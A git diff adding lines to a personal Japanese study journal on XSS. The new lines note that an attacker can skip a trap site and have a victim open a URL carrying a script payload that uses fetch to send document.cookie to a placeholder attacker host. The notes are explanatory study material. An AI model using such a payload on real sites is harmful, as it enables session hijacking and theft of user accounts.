--- a/journals/2023_08_13.md
+++ b/journals/2023_08_13.md
@@ -15,6 +15,9 @@
 				- この時、クエリパラメータsidにhttp://example.jpのCookieをつける
 				- `%2B`は`+`のASCIIコード
 			- \http://trap.example.com/infoでクエリパラメータsidの値を攻撃者のメールアドレスに送信する
+		- 必ずしも罠サイトを用意しなくても良い
+			- `http://example.jp?keyword=<script>fetch('http://trap.example.com/info?sid='%2Bdocument.cookie;</script>`を被害者に開かせれば良いので
+			- しかし、罠サイトを用意した方が被害者が開く可能性が高いだろう(被害者の興味を惹くようなコンテンツを用意できるので)
 	- 画面の書き換え
 		- 例
 			- XSSの脆弱性があるサイトのHTML要素を変更するというもの
